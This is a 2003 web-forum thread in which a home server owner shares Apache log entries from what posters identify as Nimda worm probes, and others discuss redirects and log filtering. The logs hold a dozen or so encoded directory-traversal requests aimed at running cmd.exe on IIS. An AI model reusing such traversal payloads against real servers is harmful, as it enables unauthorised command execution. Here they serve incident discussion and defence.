#1
  1. No Profile Picture
    Junior Member
    Devshed Newbie (0 - 499 posts)

    Join Date
    Mar 2003
    Posts
    2
    Rep Power
    0

    Attempted Hack??


    Hi

    Having just set up a web server on my home computer I was suprised to find this (and several identical) hack attack in my logs. I'm pretty confident I have everything nailed down (but not complacent). Wondered if anyone had any comment about this visitor??

    As they originate from blueyonder IP addresses I'm planning to report them.

    Steve


    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:34 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:34 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
  2. #2
  3. No Profile Picture
    Contributing User
    Devshed God 1st Plane (5500 - 5999 posts)

    Join Date
    Oct 2000
    Location
    Back in the real world.
    Posts
    5,966
    Rep Power
    190
    Yes, it´s a hack-attempt.
    But nothing to be done about it. They happen at least 3-10 times per day at our company´s web-server (non-public!). Some people are just too lazy to upgrade - you can tell them as often as you want...
    this makes the worms on the ´net stay alive

    no need to worry if you secured your server.
  4. #3
  5. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Nov 2001
    Location
    Broadstairs (UK)
    Posts
    17
    Rep Power
    0
    in .htaccess change to prevent server virus from writing false error messages

    redirect /scripts http://www.stoptheviruscold.invalid
    redirect /MSADC http://www.stoptheviruscold.invalid
  6. #4
  7. No Profile Picture
    Junior Member
    Devshed Newbie (0 - 499 posts)

    Join Date
    Mar 2003
    Posts
    2
    Rep Power
    0
    Thanks for info

    Further investigation shows it to be a NIMBA virus trying to get to my machine.

    I quite like the redirect idea, but not sure what advantage it offers over my own 404 message (my sever is set up with non-standard dir names and very limited access so standard attacks like this shouldn't get anywhere). Any real attack would spot the redirected http address and realise what the target site was doing.

    Interestingly did you know you can't rename cmd.exe in win2000. If you do win2000 re-creates it at boot!! Just shows that win 2000 still needs DOS.

    Steve
  8. #5
  9. No Profile Picture
    Contributing User
    Devshed God 1st Plane (5500 - 5999 posts)

    Join Date
    Oct 2000
    Location
    Back in the real world.
    Posts
    5,966
    Rep Power
    190
    Just shows that win 2000 still needs DOS.
    No. This shows that Win2k is trying not to allow you to render the system unusuable. This (the "magic" re-appearing - also if you delete the file) happens with all files in the system and system32 folders (and some more too). it´s called PC-Health and was first introduced on WinME. Win2K and XP have it too, but i think it has another name now.
  10. #6
  11. No Profile Picture
    Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Feb 2003
    Posts
    164
    Rep Power
    12
    This *NIMDA* worm is incredibly popular, alot and i mean alot of people were infected with it a while ago and are still being infected with it,
    If your servers secured against this type of intrusion you have nothing to worry about,
    the re-direction thing is a good idea for the users sake, most the people who are infected with this (if not all) dont have a clue that they are so by re-directing them to a page explaining what they have on the box and steps to removel could be really appreciated by alot of them

    Most the people who are making these types of requests are actually still vulnerable to the attack themselves (are running unpatched boxes) - so anyone can access there machines
    Thats why that re-direction thing could be good / helpful
    (something i did on my server back ago)

    All the best
  12. #7
  13. No Profile Picture
    Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Jan 2001
    Posts
    4
    Rep Power
    0
    Nimda/CodeRed doesn't care what Redirect Apache sends, thus, instructing it to redirect to anywhere does not do what you think it would do.
    If you just don't want attempts like that to show up in your log, just use SetEnvIf to filter them out. Don't ask me how (I have replied over hundred times on this issue already), just search SetEnvIf under my username.

IMN logo majestic logo threadwatch logo seochat tools logo